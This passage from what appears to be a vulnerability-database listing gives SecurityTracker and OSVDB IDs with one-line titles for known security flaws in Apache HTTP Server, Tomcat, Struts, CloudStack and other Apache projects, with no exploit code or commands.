15843| [1024332] Apache mod_cache and mod_dav Request Processing Flaw Lets Remote Users Deny Service
15844| [1024180] Apache Tomcat 'Transfer-Encoding' Header Processing Flaw Lets Remote Users Deny Service and Obtain Potentially Sensitive Information
15845| [1024096] Apache mod_proxy_http May Return Results for a Different Request
15846| [1023942] Apache mod_proxy_ajp Error Condition Lets Remote Users Deny Service
15847| [1023941] Apache ap_read_request() Memory Error May Let Remote Users Access Potentially Sensitive Information
15848| [1023778] Apache ActiveMQ Input Validation Flaw Permits Cross-Site Scripting Attacks
15849| [1023701] Apache mod_isapi Error Processing Flaw May Let Remote Users Deny Service
15850| [1023533] Apache mod_proxy Integer Overflow May Let Remote Users Execute Arbitrary Code
15851| [1022988] Apache Solaris Support Code Bug Lets Remote Users Deny Service
15852| [1022529] Apache mod_deflate Connection State Bug Lets Remote Users Deny Service
15853| [1022509] Apache mod_proxy stream_reqbody_cl() Infinite Loop Lets Remote Users Deny Service
15854| [1022296] Apache IncludesNoExec Options Restrictions Can Be Bypass By Local Users
15855| [1022264] Apache mod_proxy_ajp Bug May Disclose Another User's Response Data
15856| [1022001] Apache Tomcat mod_jk May Disclose Responses to the Wrong User
15857| [1021988] mod_perl Input Validation Flaw in Apache::Status and Apache2::Status Permits Cross-Site Scripting Attacks
15858| [1021350] NetWare Bug Lets Remote Users Access the ApacheAdmin Console
15859| [1020635] Apache Input Validation Hole in mod_proxy_ftp Permits Cross-Site Scripting Attacks
15860| [1020520] Oracle WebLogic Apache Connector Lets Remote Users Execute Arbitrary Code
15861| [1020267] Apache mod_proxy Interim Response Process Bug Lets Remote Users Deny Service
15862| [1019784] Apache-SSL Certificate Processing Bug May Let Remote Users View Portions of Kernel Memory
15863| [1019256] Apache mod_negotiation Input Validation Hole Permits Cross-Site Scripting Attacks
15864| [1019194] Apache Input Validation Hole in Mod_AutoIndex When the Character Set is Undefined May Permit Cross-Site Scripting Attacks
15865| [1019185] Apache Input Validation Hole in mod_proxy_ftp Permits Cross-Site Scripting Attacks
15866| [1019154] Apache Input Validation Hole in mod_status Permits Cross-Site Scripting Attacks
15867| [1019093] Apache Input Validation Hole in mod_imap Permits Cross-Site Scripting Attacks
15868| [1019030] Apache Input Validation Hole in Default HTTP 413 Error Page Permits Cross-Site Scripting Attacks
15869| [1018633] Apache mod_proxy Bug Lets Remote Users Deny Service
15870| [1018304] Apache HTTPD scoreboard Protection Flaw Lets Local Users Terminate Arbitrary Processes
15871| [1018303] Apache HTTPD mod_cache May Let Remote Users Deny Service
15872| [1018302] Apache mod_status Input Validation Hole Permits Cross-Site Scripting Attacks
15873| [1018269] Apache Tomcat Input Validation Hole in Processing Accept-Language Header Permits Cross-Site Scripting Attacks
15874| [1017904] Apache suEXEC Bugs May Let Local Users Gain Elevated Privileges
15875| [1017719] Apache Tomcat JK Web Server Connector Buffer Overflow in map_uri_to_worker() Lets Remote Users Execute Arbitrary Code
15876| [1017062] Apache mod_tcl Format String Bug in set_var() Function May Let Remote Users Execute Arbitrary Code
15877| [1016601] Apache mod_rewrite Off-by-one Error Lets Remote Users Execute Arbitrary Code
15878| [1016576] Apache Tomcat Discloses Directory Listings to Remote Users
15879| [1015447] Apache mod_ssl Null Pointer Dereference May Let Remote Users Deny Service
15880| [1015344] Apache mod_imap Input Validation Flaw in Referer Field Lets Remote Users Conduct Cross-Site Scripting Attacks
15881| [1015093] Apache Memory Leak in MPM 'worker.c' Code May Let Remote Users Deny Service
15882| [1014996] ApacheTop Unsafe Temporary File May Let Local Users Gain Elevated Privileges
15883| [1014833] Apache ssl_hook_Access() Function May Fail to Verify Client Certificates
15884| [1014826] Apache Memory Leak in 'byterange filter' Lets Remote Users Deny Service
15885| [1014575] Apache mod_ssl Off-by-one Buffer Overflow in Processing CRLs May Let Remote Users Deny Service
15886| [1014323] Apache Chunked Transfer-Encoding and Content-Length Processing Lets Remote Users Smuggle HTTP Requests
15887| [1013156] Apache mod_python Publisher Handler Discloses Information to Remote Users
15888| [1012829] Apache mod_auth_radius radcpy() Integer Overflow Lets Remote Users Deny Service in Certain Cases
15889| [1012416] Apache on Apple OS X Lets Remote Users Bypass Apache File Handlers and Directly Access Files
15890| [1012415] Apache on Apple HFS+ Filesystems May Disclose '.DS_Store' Files to Remote Users
15891| [1012414] Apache mod_digest_apple Lets Remote Users Replay Authentication Credentials
15892| [1012083] Apache Web Server Error in Processing Requests With Many Space Characters Lets Remote Users Deny Service
15893| [1011783] Apache mod_include Buffer Overflow Lets Local Users Execute Arbitrary Code
15894| [1011557] Apache mod_ssl SSLCipherSuite Directive Can By Bypassed in Certain Cases
15895| [1011385] Apache Satsify Directive Error May Let Remote Users Access Restricted Resources
15896| [1011340] Apache SSL Connection Abort State Error Lets Remote Users Deny Service
15897| [1011303] Apache ap_resolve_env() Buffer Overflow in Reading Configuration Files May Let Local Users Gain Elevated Privileges
15898| [1011299] Apache IPv6 Address Parsing Flaw May Let Remote Users Deny Service
15899| [1011248] Apache mod_dav LOCK Method Error May Let Remote Users Deny Service
15900| [1011213] Apache mod_ssl Can Be Crashed By Remote Users When Reverse Proxying SSL Connections
15901| [1010674] Apache Can Be Crashed By PHP Code Invoking Nested Remote Sockets
15902| [1010599] Apache httpd Header Line Memory Allocation Lets Remote Users Crash the Server
15903| [1010462] Apache mod_proxy Buffer Overflow May Let Remote Users Execute Arbitrary Code
15904| [1010322] Apache mod_ssl Stack Overflow in ssl_util_uuencode_binary() May Let Remote Users Execute Arbitrary Code
15905| [1010270] cPanel Apache mod_phpsuexec Options Let Local Users Gain Elevated Privileges
15906| [1009934] Apache Web Server Has Buffer Overflow in ebcdic2ascii() on Older Processor Architectures
15907| [1009516] Apache mod_survey HTML Report Format Lets Remote Users Conduct Cross-Site Scripting Attacks
15908| [1009509] Apache mod_disk_cache Stores Authentication Credentials on Disk
15909| [1009495] Apache Web Server Socket Starvation Flaw May Let Remote Users Deny Service
15910| [1009417] GroupWise WebAccess With Apache on NetWare Has Configuration Flaw That May Grant Web Access to Remote Users
15911| [1009338] Apache mod_access Parsing Flaw May Fail to Enforce Allow/Deny Rules
15912| [1009337] Apache mod_ssl Memory Leak Lets Remote Users Crash the Daemon
15913| [1009182] Apache for Cygwin '..%5C' Input Validation Flaw Discloses Files to Remote Users
15914| [1008973] PHP May Apply Incorrect php_admin_* Settings To Requests for Apache Virtual Hosts
15915| [1008967] Apache-SSL 'SSLFakeBasicAuth' Lets Remote Users Forge Client Certificates to Be Authenticated
15916| [1008920] Apache mod_digest May Validate Replayed Client Responses
15917| [1008828] Apache mod_python String Processing Bug Still Lets Remote Users Crash the Web Server
15918| [1008822] Apache mod_perl File Descriptor Leak May Let Local Users Hijack the http and https Services
15919| [1008675] mod_auth_shadow Apache Module Authenticates Expired Passwords
15920| [1008559] Apache mod_php File Descriptor Leak May Let Local Users Hijack the https Service
15921| [1008335] Apache mod_python String Processing Bug Lets Remote Users Crash the Web Server
15922| [1008196] Apache 2.x on Windows May Return Unexpected Files For URLs Ending With Certain Characters
15923| [1008030] Apache mod_rewrite Contains a Buffer Overflow
15924| [1008029] Apache mod_alias Contains a Buffer Overflow
15925| [1008028] Apache mod_cgid May Disclose CGI Output to Another Client
15926| [1007995] Apache Cocoon Forms May Let Remote Users Execute Arbitrary Java Code on the System
15927| [1007993] Apache Cocoon 'view-source' Sample Script Discloses Files to Remote Users
15928| [1007823] Apache Web Server mod_cgi Error May Let Malicious CGI Scripts Crash the Web Service
15929| [1007664] Apache::Gallery Unsafe Temporary Files May Let Local Users Gain Apache Web Server Privileges
15930| [1007557] Apache Web Server Does Not Filter Terminal Escape Sequences From Log Files
15931| [1007230] Apache HTTP Server 'rotatelogs' Bug on Win32 and OS/2 May Cause the Logging to Stop
15932| [1007146] Apache HTTP Server FTP Proxy Bug May Cause Denial of Service Conditions
15933| [1007145] Apache 'accept()' Errors May Cause Denial of Service Conditions
15934| [1007144] Apache Web Server 'type-map' File Error Permits Local Denial of Service Attacks
15935| [1007143] Apache 2.0 Web Server May Use a Weaker Encryption Implementation Than Specified in Some Cases
15936| [1006864] Apache Web Server Can Be Crashed By Remote Users Via mod_dav Flaws and Also Via Basic Authentication
15937| [1006709] Apache mod_survey Input Validation Flaw Lets Remote Users Fill Up Disk Space
15938| [1006614] Apache mod_ntlm Buffer Overflow and Format String Flaw Let Remote Users Execute Arbitary Code
15939| [1006591] Apache mod_access_referer Module Null Pointer Dereference May Faciliate Denial of Service Attacks
15940| [1006444] Apache 2.0 Web Server Line Feed Buffer Allocation Flaw Lets Remote Users Deny Service
15941| [1006021] Apache Tomcat Server URL Parsing Error May Disclose Otherwise Inaccessible Web Directory Listings and Files to Remote Users
15942| [1005963] Apache Web Server 2.x Windows Device Access Flaw Lets Remote Users Crash the Server or Possibly Execute Arbitrary Code
15943| [1005962] Apache Web Server Path Parsing Flaw May Allow Remote Users to Execute Code in Certain Configurations
15944| [1005848] Apache 'printenv' Script Input Validation Bugs in Older Versions May Let Remote Users Conduct Cross-Site Scripting Attacks
15945| [1005765] Apache mod_jk Module Processing Bug When Used With Tomcat May Disclose Information to Remote Users or Crash
15946| [1005548] Apache mod_php Module May Allow Local Users to Gain Control of the Web Port
15947| [1005499] Apache Web Server (2.0.42) May Disclose CGI Source Code to Remote Users When Used With WebDAV
15948| [1005410] Apache Tomcat Java Servlet Engine Can Be Crashed Via Multiple Requests for DOS Device Names
15949| [1005351] Apache Web Server (1.3.x) Shared Memory Scoreboard Bug Lets Certain Local Users Issue Signals With Root Privileges
15950| [1005331] Apache Web Server (2.x) SSI Server Signature Filtering Hole Lets Remote Users Conduct Cross-Site Scripting Attacks
15951| [1005290] Apache Tomcat Java Server Default Servlet Returns JSP Source Code to Remote Users
15952| [1005285] Apache Web Server 'mod_dav' Has Null Pointer Bug That May Allow Remote Users to Cause Denial of Service Conditions
15953| [1005010] Apache Web Server (2.0) Has Unspecified Flaw That Allows Remote Users to Obtain Sensitive Data and Cause Denial of Service Conditions
15954| [1004770] Apache 2.x Web Server ap_log_rerror() Function May Disclose Full Installation Path to Remote Users
15955| [1004745] Apache Tomcat Java Server Allows Cross-Site Scripting Attacks
15956| [1004636] Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code
15957| [1004602] Apache Tomcat Java Server for Windows Can Be Crashed By Remote Users Sending Malicious Requests to Hang All Available Working Threads
15958| [1004586] Apache Tomcat Java Server May Disclose the Installation Path to Remote Users
15959| [1004555] Apache Web Server Chunked Encoding Flaw May Let Remote Users Execute Arbitrary Code on the Server
15960| [1004209] Apache 'mod_python' Python Language Interpreter Bug in Publisher Handler May Allow Remote Users to Modify Files on the System
15961| [1003874] Apache Web Server for Windows Has Batch File Processing Hole That Lets Remote Users Execute Commands on the System
15962| [1003767] 'mod_frontpage' Module for Apache Web Server Has Buffer Overlow in 'fpexec.c' That Allows Remote Users to Execute Arbitrary Code on the System with Root Privileges
15963| [1003723] Apache-SSL for Apache Web Server Has Buffer Overflow That Can Be Triggered By Remote Users
15964| [1003664] 'mod_ssl' Security Package for Apache Web Server Has Buffer Overflow That Can Be Triggered By Remote Users
15965| [1003602] GNUJSP Java Server Pages Implementation Discloses Web Files and Source Code to Remote Users and Bypasses Apache Access Control Restrictions
15966| [1003465] PHP for Apache Web Server May Disclose Installation Path Information to Remote Users Making 'OPTIONS' Requests
15967| [1003451] Oracle Application Server PL/SQL Module for Apache Has Buffer Overflows That Allow Remote Users to Execute Arbitrary Code and Gain Access to the Server
15968| [1003131] Apache Web Server in Virtual Hosting Mode Can Be Crashed By a Local User Removing a Log Directory
15969| [1003104] PHP.EXE Windows CGI for Apache Web Server May Let Remote Users View Files on the Server Due to Configuration Error
15970| [1003008] Apache 'mod_bf' Module Lets Remote Users Execute Arbitrary Code
15971| [1002629] Apache suEXEC Wrapper Fails to Observe Minimum Group ID Security Settings in Certain Situations
15972| [1002542] Apache Web Server Virtual Hosting Split-Logfile Function Lets Remote Users Write Log Entries to Arbitrary Files on the System
15973| [1002400] Apache mod_gzip Module Has Buffer Overflow That Can Be Exploited By Local Users to Gain Elevated Privileges
15974| [1002303] Several 3rd Party Apache Authentication Modules Allow Remote Users to Execute Arbitrary Code to Gain Access to the System or Execute Stored Procedures to Obtain Arbitrary Database Information
15975| [1002188] Apache Web Server Discloses Internal IP Addresses to Remote Users in Certain Configurations
15976| [1001989] Apache Web Server May Disclose Directory Contents Even If an Index.html File is Present in the Directory
15977| [1001719] Apache Web Server on Mac OS X Client Fails to Enforce File and Directory Access Protections, Giving Remote Users Access to Restricted Pages
15978| [1001572] Apache Web Server on Microsoft Windows Platforms Allows Remote Users to Crash the Web Server
15979| [1001304] Apache Web Server for Windows Lets Remote Users Crash the Web Server Application
15980| [1001083] Apache Web Server May Display Directory Index Listings Even if Directory Listings Are Disabled
15981|
15982| OSVDB - http://www.osvdb.org:
15983| [96078] Apache CloudStack Infrastructure Menu Setup Network Multiple Field XSS
15984| [96077] Apache CloudStack Global Settings Multiple Field XSS
15985| [96076] Apache CloudStack Instances Menu Display Name Field XSS
15986| [96075] Apache CloudStack Instances Menu Add Instances Network Name Field XSS
15987| [96074] Apache CloudStack Instances Menu Add Instances Review Step Multiple Field XSS
15988| [96031] Apache HTTP Server suEXEC Symlink Arbitrary File Access
15989| [95888] Apache Archiva Single / Double Quote Character Handling XSS Weakness
15990| [95885] Apache Subversion mod_dav_svn Module Crafted HTTP Request Handling Remote DoS
15991| [95706] Apache OpenOffice.org (OOo) OOXML Document File XML Element Handling Memory Corruption
15992| [95704] Apache OpenOffice.org (OOo) DOC File PLCF Data Handling Memory Corruption
15993| [95603] Apache Continuum web/util/GenerateRecipentNotifier.java recipient Parameter XSS
15994| [95602] Apache Continuum web/action/notifier/JabberProjectNotifierEditAction-jabberProjectNotifierSave-validation.xml Multiple Parameter XSS
15995| [95601] Apache Continuum web/action/notifier/JabberGroupNotifierEditAction-jabberProjectGroupNotifierSave-validation.xml Multiple Parameter XSS
15996| [95600] Apache Continuum web/action/ScheduleAction-saveSchedule-validation.xml Multiple Parameter XSS
15997| [95599] Apache Continuumweb/action/BuildDefinitionAction-saveBuildDefinition-validation.xml Multiple Parameter XSS
15998| [95598] Apache Continuum web/action/AddProjectAction-addProject-validation.xml Multiple Parameter XSS
15999| [95597] Apache Continuum web/action/ProjectEditAction-projectSave-validation.xml Multiple Parameter XSS
16000| [95596] Apache Continuum web/action/notifier/IrcGroupNotifierEditAction-ircProjectGroupNotifierSave-validation.xml Multiple Parameter XSS
16001| [95595] Apache Continuum web/action/notifier/IrcProjectNotifierEditAction-ircProjectNotifierSave-validation.xml Multiple Parameter XSS
16002| [95594] Apache Continuum web/action/ProjectGroupAction.java Multiple Parameter XSS
16003| [95593] Apache Continuum web/action/AddProjectGroupAction.java Multiple Parameter XSS
16004| [95592] Apache Continuum web/action/AddProjectAction.java Multiple Parameter XSS
16005| [95523] Apache OFBiz Webtools Application View Log Screen Unspecified XSS
16006| [95522] Apache OFBiz Nested Expression Evaluation Arbitrary UEL Function Execution
16007| [95521] Apache HTTP Server mod_session_dbd Session Saving Unspecified Issue
16008| [95498] Apache HTTP Server mod_dav.c Crafted MERGE Request Remote DoS
16009| [95406] Apache Struts DefaultActionMapper Multiple Prefixing Parameters Arbitrary Site Redirect
16010| [95405] Apache Struts DefaultActionMapper Multiple Prefixing Parameters Remote Code Execution
16011| [95011] Apache CXF XML Parser SOAP Message Handling CPU Resource Exhaustion Remote DoS
16012| [94705] Apache Geronimo RMI Classloader Exposure Serialized Object Handling Remote Code Execution
16013| [94651] Apache Santuario (XML Security for C++) XML Signature CanonicalizationMethod Parameter Spoofing Weakness
16014| [94636] Apache Continuum workingCopy.action userDirectory Traversal Arbitrary File Access
16015| [94635] Apache Maven SCM SvnCommandlineUtils Process Listing Local Password Disclosure
16016| [94632] Apache Maven Wagon SSH (wagon-ssh) Host Verification Failure MitM Weakness
16017| [94625] Apache Santuario (XML Security for C++) XML Signature Reference Crafted XPointer Expression Handling Heap Buffer Overflow
16018| [94618] Apache Archiva /archiva/security/useredit.action username Parameter XSS
16019| [94617] Apache Archiva /archiva/security/roleedit.action name Parameter XSS
16020| [94616] Apache Archiva /archiva/security/userlist!show.action roleName Parameter XSS
16021| [94615] Apache Archiva /archiva/deleteArtifact!doDelete.action groupId Parameter XSS
16022| [94614] Apache Archiva /archiva/admin/addLegacyArtifactPath!commit.action legacyArtifactPath.path Parameter XSS
16023| [94613] Apache Archiva /archiva/admin/addRepository.action Multiple Parameter XSS
16024| [94612] Apache Archiva /archiva/admin/editAppearance.action Multiple Parameter XSS
16025| [94611] Apache Archiva /archiva/admin/addLegacyArtifactPath.action Multiple Parameter XSS
16026| [94610] Apache Archiva /archiva/admin/addNetworkProxy.action Multiple Parameter XSS
16027| [94403] Apache Santuario (XML Security for C++) InclusiveNamespace PrefixList Processing Heap Overflow
16028| [94402] Apache Santuario (XML Security for C++) HMAC-based XML Signature Processing DoS
16029| [94401] Apache Santuario (XML Security for C++) XPointer Evaluation Stack Overflow
16030| [94400] Apache Santuario (XML Security for C++) HMAC-Based XML Signature Reference Element Validation Spoofing Weakness
16031| [94279] Apache Qpid CA Certificate Validation Bypass
16032| [94275] Apache Solr JettySolrRunner.java Can Not Find Error Message XSS
16033| [94233] Apache OpenJPA Object Deserialization Arbitrary Executable Creation
16034| [94042] Apache Axis JAX-WS Java Unspecified Exposure
16035| [93969] Apache Struts OGNL Expression Handling Double Evaluation Error Remote Command Execution
16036| [93796] Apache Subversion Filename Handling FSFS Repository Corruption Remote DoS
16037| [93795] Apache Subversion svnserve Server Aborted Connection Message Handling Remote DoS
16038| [93794] Apache Subversion contrib/hook-scripts/check-mime-type.pl svnlook Hyphenated argv Argument Handling Remote DoS
16039| [93793] Apache Subversion contrib/hook-scripts/svn-keyword-check.pl Filename Handling Remote Command Execution
16040| [93646] Apache Struts Crafted Parameter Arbitrary OGNL Code Execution
16041| [93645] Apache Struts URL / Anchor Tag includeParams Attribute Remote Command Execution
16042| [93636] Apache Pig Multiple Physical Operator Memory Exhaustion Remote Remote DoS
16043| [93635] Apache Wink DTD (Document Type Definition) Expansion Data Parsing Information Disclosure
16044| [93605] RT Apache::Session::File Session Replay Reuse Information Disclosure
16045| [93599] Apache Derby SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY Boot Password Manipulation Re-encryption Failure Password Corruption
16046| [93555] Apache Commons Codec Invalid Base32 String Information Tunneling Weakness
16047| [93554] Apache HBase bulkLoadHFiles() Method ACL Bypass
16048| [93543] JBoss Enterprise Application Platform org.apache.catalina.connector.Response.encodeURL() Method MitM jsessionid Disclosure
16049| [93542] Apache ManifoldCF (Connectors Framework) org.apache.manifoldcf.crawler.ExportConfiguration Class Configuration Export Password Disclosure
16050| [93541] Apache Solr json.wrf Callback XSS
16051| [93524] Apache Hadoop GetSecurityDescriptorControl() Function Absolute Security Descriptor Handling NULL Descriptor Weakness
16052| [93521] Apache jUDDI Security API Token Session Persistence Weakness
16053| [93520] Apache CloudStack Default SSL Key Weakness
16054| [93519] Apache Shindig /ifr Cross-site Arbitrary Gadget Invocation
16055| [93518] Apache Solr /admin/analysis.jsp name Parameter XSS
16056| [93517] Apache CloudStack setup-cloud-management /etc/sudoers Modification Local Privilege Escalation
16057| [93516] Apache CXF UsernameTokenInterceptor Nonce Caching Replay Weakness
16058| [93515] Apache HBase table.jsp name Parameter XSS
16059| [93514] Apache CloudStack Management Server Unauthenticated Remote JMX Connection Default Setting Weakness
16060| [93463] Apache Struts EL / OGNL Interpretation Unspecified Remote Code Execution
16061| [93462] Apache CXF WS-SecurityPolicy AlgorithmSuite Arbitrary Ciphertext Decryption Weakness
16062| [93401] Apache Hadoop core-site.xml Permission Weakness Local Alfredo Secret Disclosure
16063| [93400] Apache Hadoop Map/Reduce Job Log Directory Symlink Arbitrary File Mode Manipulation
16064| [93397] Apache Wicket Referrer HTTP Header Session ID Disclosure
16065| [93366] Apache HTTP Server modules/mappers/mod_rewrite.c do_rewritelog() Function Log File Terminal Escape Sequence Filtering Remote Command Execution
16066| [93254] Apache Tomcat AsyncListener Method Cross-session Information Disclosure
16067| [93253] Apache Tomcat Chunked Transfer Encoding Data Saturation Remote DoS
16068| [93252] Apache Tomcat FORM Authenticator Session Fixation
16069| [93172] Apache Camel camel/endpoints/ Endpoint XSS
16070| [93171] Apache Sling HtmlResponse Error Message XSS
16071| [93170] Apache Directory DelegatingAuthenticator MitM Spoofing Weakness
16072| [93169] Apache Wave AuthenticationServlet.java Session Fixation Weakness
16073| [93168] Apache Click ErrorReport.java id Parameter XSS
16074| [93167] Apache ActiveMQ JMSXUserId Spoofing Weakness
16075| [93166] Apache CXF Crafted Message Element Count Handling System Resource Exhaustion Remote DoS
16076| [93165] Apache CXF Crafted Message Element Level Handling System Resource Exhaustion Remote DoS
16077| [93164] Apache Harmony DatagramSocket Class connect Method CheckAccept() IP Blacklist Bypass
16078| [93163] Apache Hadoop Map/Reduce Daemon Symlink Arbitrary File Overwrite
16079| [93162] Apache VelocityStruts struts/ErrorsTool.getMsgs Error Message XSS
16080| [93161] Apache CouchDB Rewriter VM Atom Table Memory Exhaustion Remote DoS
16081| [93158] Apache Wicket BookmarkablePageLink Feature XSS CSRF
16082| [93157] Apache Struts UrlHelper.java s:url includeParams Functionality XSS
16083| [93156] Apache Tapestry Calendar Component datefield.js datefield Parameter XSS
16084| [93155] Apache Struts fielderror.ftl fielderror Parameter Error Message XSS
16085| [93154] Apache JSPWiki Edit.jsp createPages WikiPermission Bypass
16086| [93153] Apache PDFBox PDFXrefStreamParser Missing Element Handling PDF Parsing DoS
16087| [93152] Apache Hadoop HttpServer.java Multiple Function XSS
16088| [93151] Apache Shiro Search Filter userName Parameter LDAP Code Injection Weakness
16089| [93150] Apache Harmony java.net.SocketPermission Class boolean equals Function checkConnect() Weakness Host Name Retrieval
16090| [93149] Apache Harmony java.security.Provider Class void load Function checkSecurityAccess() Weakness
16091| [93148] Apache Harmony java.security.ProtectionDomain Class java.lang.String.toString() Function checkPermission() Weakness
16092| [93147] Apache Harmony java.net.URLConnection openConnection Function checkConnect Weakness Proxy Connection Permission Bypass
16093| [93146] Apache Harmony java.net.ServerSocket Class void implAccept Function checkAccept() Weakness SerSocket Subclass Creation
16094| [93145] Apache Qpid JMS Client Detached Session Frame Handling NULL Pointer Dereference Remote DoS
16095| [93144] Apache Solr Admin Command Execution CSRF
16096| [93009] Apache VCL XMLRPC API Unspecified Function Remote Privilege Escalation
16097| [93008] Apache VCL Web GUI Unspecified Remote Privilege Escalation
16098| [92997] Apache Commons Codec org.apache.commons.codec.net.URLCodec Fields Missing 'final' Thread-safety Unspecified Issue
16099| [92976] Apache ActiveMQ scheduled.jsp crontab Command XSS
16100| [92947] Apache Commons Codec org.apache.commons.codec.language.Soundex.US_ENGLISH_MAPPING Missing MS_PKGPROTECT Field Manipulation Unspecified Issue
16101| [92749] Apache CloudStack Predictable Hash Virtual Machine Console Console Access URL Generation
16102| [92748] Apache CloudStack VM Console Access Restriction Bypass
16103| [92709] Apache ActiveMQ Web Console Unauthenticated Remote Access
16104| [92708] Apache ActiveMQ Sample Web Application Broker Resource Consumption Remote DoS
16105| [92707] Apache ActiveMQ webapp/websocket/chat.js Subscribe Message XSS
16106| [92706] Apache ActiveMQ Debug Log Rendering XSS
16107| [92705] Apache ActiveMQ PortfolioPublishServlet.java refresh Parameter XSS
16108| [92270] Apache Tomcat Unspecified CSRF
16109| [92094] Apache Subversion mod_dav_svn Module Nonexistent URL Lock Request Handling NULL Pointer Dereference Remote DoS
16110| [92093] Apache Subversion mod_dav_svn Module Activity URL PROPFIND Request Handling NULL Pointer Dereference Remote DoS
16111| [92092] Apache Subversion mod_dav_svn Module Log REPORT Request Handling NULL Pointer Dereference Remote DoS
16112| [92091] Apache Subversion mod_dav_svn Module Node Property Handling Resource Exhaustion Remote DoS
16113| [92090] Apache Subversion mod_dav_svn Module Activity URL Lock Request Handling NULL Pointer Dereference Remote DoS
16114| [91774] Apache Commons Codec Unspecified Non-private Field Manipulation Weakness
16115| [91628] mod_ruid2 for Apache HTTP Server fchdir() Inherited File Descriptor chroot Restriction Bypass
16116| [91328] Apache Wicket $up$ Traversal Arbitrary File Access
16117| [91295] Apple Mac OS X Apache Unicode Character URI Handling Authentication Bypass
16118| [91235] Apache Rave /app/api/rpc/users/get User Object Hashed Password Remote Disclosure
16119| [91185] Munin Default Apache Configuration Permission Weakness Remote Information Disclosure
16120| [91173] Apache Wicket WebApplicationPath Constructor Bypass /WEB-INF/ Directory File Access
16121| [91172] Apache Wicket PackageResourceGuard File Extension Filter Bypass
16122| [91025] Apache Qpid qpid::framing::Buffer Class Multiple Method Out-of-bounds Access Remote DoS
16123| [91024] Apache Qpid federation_tag Attribute Handling Federated Interbroker Link Access Restriction Bypass
16124| [91023] Apache Qpid AMQP Type Decoder Exposure Array Size Value Handling Memory Consumption Remote DoS
16125| [91022] Apache Qpid qpid/cpp/include/qpid/framing/Buffer.h qpid::framing::Buffer::checkAvailable() Function Integer Overflow
16126| [90986] Apache Jena ARQ INSERT DATA Request Handling Overflow
16127| [90907] Apache Subversion mod_dav_svn / libsvn_fs svn_fs_file_length() Function MKACTIVITY / PROPFIND Option Request Handling Remote DoS
16128| [90906] Apache Commons FileUpload /tmp Storage Symlink Arbitrary File Overwrite
16129| [90864] Apache Batik 1xx Redirect Script Origin Restriction Bypass
16130| [90858] Apache Ant Malformed TAR File Handling Infinite Loop DoS
16131| [90852] Apache HTTP Server for Debian apachectl /var/lock Permission Weakness Symlink Directory Permission Manipulation
16132| [90804] Apache Commons CLI Path Subversion Local Privilege Escalation
16133| [90802] Apache Avro Recursive Schema Handling Infinite Recursion DoS
16134| [90592] Apache Batik ApplicationSecurityEnforcer.java Multiple Method Security Restriction Bypass
16135| [90591] Apache Batik XML External Entity (XXE) Data Parsing Arbitrary File Disclosure
16136| [90565] Apache Tomcat Log Directory Permission Weakness Local Information Disclosure
16137| [90564] Apache Maven / Maven Wagon SSL Certificate Validation MitM Spoofing Weakness
16138| [90557] Apache HTTP Server mod_proxy_balancer balancer-manager Interface Multiple Parameter XSS
16139| [90556] Apache HTTP Server Multiple Module Multiple Parameter XSS
16140| [90276] Apache Axis2 axis2.xml Plaintext Password Local Disclosure
16141| [90249] Apache Axiom ClassLoader XMLInputFactory / XMLOutputFactory Construction Unspecified Issue
16142| [90235] Apache Commons HttpClient Certificate Wildcard Matching Weakness
16143| [90079] Apache CXF WSS4JInInterceptor URIMappingInterceptor WS-Security SOAP Service Access Restriction Bypass
16144| [90078] Apache CXF WS-SecurityPolicy Enabled Plaintext UsernameTokens Handling Authentication Bypass
16145| [89453] Apache Open For Business Project (OFBiz) Screenlet.title Widget Attribute XSS
16146| [89452] Apache Open For Business Project (OFBiz) Image.alt Widget Attribute XSS
16147| [89294] Apache CouchDB Futon UI Browser-based Test Suite Query Parameter XSS
16148| [89293] Apache CouchDB Unspecified Traversal Arbitrary File Access
16149| [89275] Apache HTTP Server mod_proxy_ajp Module Expensive Request Parsing Remote DoS
16150| [89267] Apache CouchDB JSONP Callback Handling Unspecified XSS
16151| [89146] Apache CloudStack Master Server log4j.conf SSH Private Key / Plaintext Password Disclosure
16152| [88603] Apache OpenOffice.org (OOo) Unspecified Information Disclosure
16153| [88602] Apache OpenOffice.org (OOo) Unspecified Manifest-processing Issue
16154| [88601] Apache OpenOffice.org (OOo) Unspecified PowerPoint File Handling Issue
16155| [88285] Apache Tomcat Partial HTTP Request Saturation Remote DoS
16156| [88095] Apache Tomcat NIO Connector Terminated Connection Infinte Loop DoS
16157| [88094] Apache Tomcat FORM Authentication Crafted j_security_check Request Security Constraint Bypass
16158| [88093] Apache Tomcat Null Session Requst CSRF Prevention Filter Bypass
16159| [88043] IBM Tivoli Netcool/Reporter Apache CGI Unspecified Remote Command Execution
16160| [87580] Apache Tomcat DIGEST Authentication Session State Caching Authentication Bypass Weakness
16161| [87579] Apache Tomcat DIGEST Authentication Stale Nonce Verification Authentication Bypass Weakness
16162| [87477] Apache Tomcat Project Woodstock Service Error Page UTF-7 XSS Weakness
16163| [87227] Apache Tomcat InternalNioInputBuffer.java parseHeaders() Function Request Header Size Parsing Remote DoS
16164| [87223] Apache Tomcat DIGEST Authentication replay-countermeasure Functionality cnonce / cn Verification Authentication Bypass Weakness
16165| [87160] Apache Commons HttpClient X.509 Certificate Domain Name Matching MiTM Weakness
16166| [87159] Apache CXF X.509 Certificate Domain Name Matching MiTM Weakness
16167| [87150] Apache Axis / Axis2 X.509 Certificate Domain Name Matching MiTM Weakness
16168| [86902] Apache HTTP Server 3xx Redirect Internal IP Address Remote Disclosure
16169| [86901] Apache Tomcat Error Message Path Disclosure
16170| [86684] Apache CloudStack Unauthorized Arbitrary API Call Invocation
16171| [86556] Apache Open For Business Project (OFBiz) Unspecified Issue
16172| [86503] Visual Tools VS home/apache/DiskManager/cron/init_diskmgr Local Command Execution
16173| [86401] Apache ActiveMQ ResourceHandler Traversal Arbitrary File Access
16174| [86225] Apache Axis2 XML Signature Wrapping (XSW) Authentication Bypass
16175| [86206] Apache Axis2 Crafted SAML Assertion Signature Exclusion Attack Authentication Bypass
16176| [85722] Apache CXF SOAP Request Parsing Access Restriction Bypass
16177| [85704] Apache Qpid Incoming Client Connection Saturation Remote DoS
16178| [85474] Eucalyptus Apache Santuario (XML Security for Java) Library XML Signature Transform Handling DoS
16179| [85430] Apache mod_pagespeed Module Unspecified XSS
16180| [85429] Apache mod_pagespeed Module Hostname Verification Cross-host Resource Disclosure
16181| [85249] Apache Wicket Unspecified XSS
16182| [85236] Apache Hadoop conf/hadoop-env.sh Temporary File Symlink Arbitrary File Manipulation
